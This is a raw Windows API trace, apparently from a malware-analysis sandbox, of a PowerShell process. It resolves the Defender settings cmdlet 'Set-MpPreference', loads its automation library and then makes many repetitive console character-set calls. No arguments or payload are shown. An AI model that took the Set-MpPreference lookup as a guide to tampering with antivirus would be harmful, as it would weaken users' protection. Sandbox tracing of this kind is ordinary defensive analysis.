	[0063.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0063.839] GetLastError () returned 0x2
	[0063.839] SetErrorMode (uMode=0x1) returned 0x1
	[0063.839] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.JSE", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.839] GetLastError () returned 0x2
	[0063.839] SetErrorMode (uMode=0x1) returned 0x1
	[0063.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0063.839] GetLastError () returned 0x2
	[0063.840] SetErrorMode (uMode=0x1) returned 0x1
	[0063.840] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.WSF", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.840] GetLastError () returned 0x2
	[0063.840] SetErrorMode (uMode=0x1) returned 0x1
	[0063.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0063.840] GetLastError () returned 0x2
	[0063.840] SetErrorMode (uMode=0x1) returned 0x1
	[0063.840] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.WSH", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.840] GetLastError () returned 0x2
	[0063.840] SetErrorMode (uMode=0x1) returned 0x1
	[0063.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0063.840] GetLastError () returned 0x2
	[0063.840] SetErrorMode (uMode=0x1) returned 0x1
	[0063.840] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.MSC", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.841] GetLastError () returned 0x2
	[0063.841] SetErrorMode (uMode=0x1) returned 0x1
	[0063.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0063.841] GetLastError () returned 0x2
	[0063.841] SetErrorMode (uMode=0x1) returned 0x1
	[0063.841] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.841] GetLastError () returned 0x2
	[0063.841] SetErrorMode (uMode=0x1) returned 0x1
	[0063.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.843] GetLastError () returned 0xcb
	[0063.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x570eb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.844] GetLastError () returned 0x2
	[0063.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x570eb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.844] GetLastError () returned 0x2
	[0063.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x570eb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.844] GetLastError () returned 0x2
	[0063.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x570eb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0063.844] GetLastError () returned 0x2
	[0063.911] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.911] GetLastError () returned 0xcb
	[0064.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0064.018] GetLastError () returned 0xcb
	[0064.022] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0064.022] GetLastError () returned 0xcb
	[0064.044] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0064.044] GetLastError () returned 0xcb
	[0064.050] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0064.050] GetLastError () returned 0xcb
	[0064.052] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0064.052] GetLastError () returned 0xcb
	[0064.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0064.068] GetLastError () returned 0xcb
	[0064.098] VirtualQuery (in: lpAddress=0x570db5c, lpBuffer=0x570eb5c, dwLength=0x1c | out: lpBuffer=0x570eb5c*(BaseAddress=0x570d000, AllocationBase=0x4d80000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0064.158] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0064.158] GetLastError () returned 0xcb
	[0064.224] VirtualQuery (in: lpAddress=0x570db5c, lpBuffer=0x570eb5c, dwLength=0x1c | out: lpBuffer=0x570eb5c*(BaseAddress=0x570d000, AllocationBase=0x4d80000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0064.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x570e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0064.230] GetLastError () returned 0xcb
	[0064.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x570e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0064.230] GetLastError () returned 0xcb
	[0064.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x570e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0064.230] GetLastError () returned 0xcb
	[0064.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x570e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0064.231] GetLastError () returned 0xcb
	[0064.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x570e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0064.280] GetLastError () returned 0xcb
	[0064.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x570e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0064.280] GetLastError () returned 0xcb
	[0064.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x570e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0064.280] GetLastError () returned 0xcb
	[0064.311] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0064.311] GetLastError () returned 0xcb
	[0064.312] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x570e6a0 | out: lpConsoleScreenBufferInfo=0x570e6a0) returned 1
	[0064.312] GetLastError () returned 0xcb
	[0064.316] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0064.316] GetLastError () returned 0xcb
	[0064.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x570e1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0064.318] GetLastError () returned 0xcb
	[0064.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x570e1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0064.318] GetLastError () returned 0xcb
	[0064.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x570e1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0064.318] GetLastError () returned 0xcb
	[0064.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0064.373] GetLastError () returned 0xcb
	[0064.411] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0064.412] GetLastError () returned 0xcb
	[0064.412] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x570edb4 | out: lpConsoleScreenBufferInfo=0x570edb4) returned 1
	[0064.412] GetLastError () returned 0xcb
	[0064.413] GetConsoleOutputCP () returned 0x1b5
	[0064.415] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ed10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ed10) returned 0
	[0064.415] GetLastError () returned 0xcb
	[0064.415] GetConsoleOutputCP () returned 0x1b5
	[0064.415] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ed10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ed10) returned 0
	[0064.415] GetLastError () returned 0xcb
	[0064.415] GetConsoleOutputCP () returned 0x1b5
	[0064.415] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.415] GetLastError () returned 0xcb
	[0064.416] GetConsoleOutputCP () returned 0x1b5
	[0064.416] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.416] GetLastError () returned 0xcb
	[0064.416] GetConsoleOutputCP () returned 0x1b5
	[0064.416] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.416] GetLastError () returned 0xcb
	[0064.416] GetConsoleOutputCP () returned 0x1b5
	[0064.416] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.416] GetLastError () returned 0xcb
	[0064.416] GetConsoleOutputCP () returned 0x1b5
	[0064.416] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.416] GetLastError () returned 0xcb
	[0064.416] GetConsoleOutputCP () returned 0x1b5
	[0064.416] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.416] GetLastError () returned 0xcb
	[0064.416] GetConsoleOutputCP () returned 0x1b5
	[0064.416] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.416] GetLastError () returned 0xcb
	[0064.416] GetConsoleOutputCP () returned 0x1b5
	[0064.416] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.416] GetLastError () returned 0xcb
	[0064.416] GetConsoleOutputCP () returned 0x1b5
	[0064.416] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.416] GetLastError () returned 0xcb
	[0064.416] GetConsoleOutputCP () returned 0x1b5
	[0064.416] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.416] GetLastError () returned 0xcb
	[0064.416] GetConsoleOutputCP () returned 0x1b5
	[0064.417] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.417] GetLastError () returned 0xcb
	[0064.417] GetConsoleOutputCP () returned 0x1b5
	[0064.417] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.417] GetLastError () returned 0xcb
	[0064.417] GetConsoleOutputCP () returned 0x1b5
	[0064.417] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.417] GetLastError () returned 0xcb
	[0064.417] GetConsoleOutputCP () returned 0x1b5
	[0064.417] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.417] GetLastError () returned 0xcb
	[0064.417] GetConsoleOutputCP () returned 0x1b5
	[0064.417] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.417] GetLastError () returned 0xcb
	[0064.417] GetConsoleOutputCP () returned 0x1b5
	[0064.417] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.417] GetLastError () returned 0xcb
	[0064.417] GetConsoleOutputCP () returned 0x1b5
	[0064.417] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.417] GetLastError () returned 0xcb
	[0064.417] GetConsoleOutputCP () returned 0x1b5
	[0064.417] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.417] GetLastError () returned 0xcb
	[0064.417] GetConsoleOutputCP () returned 0x1b5
	[0064.417] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.417] GetLastError () returned 0xcb
	[0064.417] GetConsoleOutputCP () returned 0x1b5
	[0064.418] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.418] GetLastError () returned 0xcb
	[0064.418] GetConsoleOutputCP () returned 0x1b5
	[0064.418] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.418] GetLastError () returned 0xcb
	[0064.418] GetConsoleOutputCP () returned 0x1b5
	[0064.418] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.418] GetLastError () returned 0xcb
	[0064.418] GetConsoleOutputCP () returned 0x1b5
	[0064.418] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.418] GetLastError () returned 0xcb
	[0064.418] GetConsoleOutputCP () returned 0x1b5
	[0064.418] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.418] GetLastError () returned 0xcb
	[0064.418] GetConsoleOutputCP () returned 0x1b5
	[0064.418] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.418] GetLastError () returned 0xcb
	[0064.418] GetConsoleOutputCP () returned 0x1b5
	[0064.418] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.418] GetLastError () returned 0xcb
	[0064.418] GetConsoleOutputCP () returned 0x1b5
	[0064.418] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.419] GetLastError () returned 0xcb
	[0064.419] GetConsoleOutputCP () returned 0x1b5
	[0064.419] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.419] GetLastError () returned 0xcb
	[0064.419] GetConsoleOutputCP () returned 0x1b5
	[0064.419] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.419] GetLastError () returned 0xcb
	[0064.419] GetConsoleOutputCP () returned 0x1b5
	[0064.419] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.419] GetLastError () returned 0xcb
	[0064.419] GetConsoleOutputCP () returned 0x1b5
	[0064.419] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.419] GetLastError () returned 0xcb
	[0064.419] GetConsoleOutputCP () returned 0x1b5
	[0064.419] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.419] GetLastError () returned 0xcb
	[0064.419] GetConsoleOutputCP () returned 0x1b5
	[0064.419] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.419] GetLastError () returned 0xcb
	[0064.419] GetConsoleOutputCP () returned 0x1b5
	[0064.419] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.419] GetLastError () returned 0xcb
	[0064.419] GetConsoleOutputCP () returned 0x1b5
	[0064.419] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.419] GetLastError () returned 0xcb
	[0064.419] GetConsoleOutputCP () returned 0x1b5
	[0064.419] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.419] GetLastError () returned 0xcb
	[0064.420] GetConsoleOutputCP () returned 0x1b5
	[0064.420] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.420] GetLastError () returned 0xcb
	[0064.420] GetConsoleOutputCP () returned 0x1b5
	[0064.420] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.420] GetLastError () returned 0xcb
	[0064.420] GetConsoleOutputCP () returned 0x1b5
	[0064.420] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.420] GetLastError () returned 0xcb
	[0064.420] GetConsoleOutputCP () returned 0x1b5
	[0064.420] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.420] GetLastError () returned 0xcb
	[0064.420] GetConsoleOutputCP () returned 0x1b5
	[0064.420] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.420] GetLastError () returned 0xcb
	[0064.420] GetConsoleOutputCP () returned 0x1b5
	[0064.420] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.420] GetLastError () returned 0xcb
	[0064.420] GetConsoleOutputCP () returned 0x1b5
	[0064.420] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.420] GetLastError () returned 0xcb
	[0064.420] GetConsoleOutputCP () returned 0x1b5
	[0064.420] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.420] GetLastError () returned 0xcb
	[0064.420] GetConsoleOutputCP () returned 0x1b5
	[0064.420] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.420] GetLastError () returned 0xcb
	[0064.421] GetConsoleOutputCP () returned 0x1b5
	[0064.421] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.421] GetLastError () returned 0xcb
	[0064.421] GetConsoleOutputCP () returned 0x1b5
	[0064.421] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.421] GetLastError () returned 0xcb
	[0064.421] GetConsoleOutputCP () returned 0x1b5
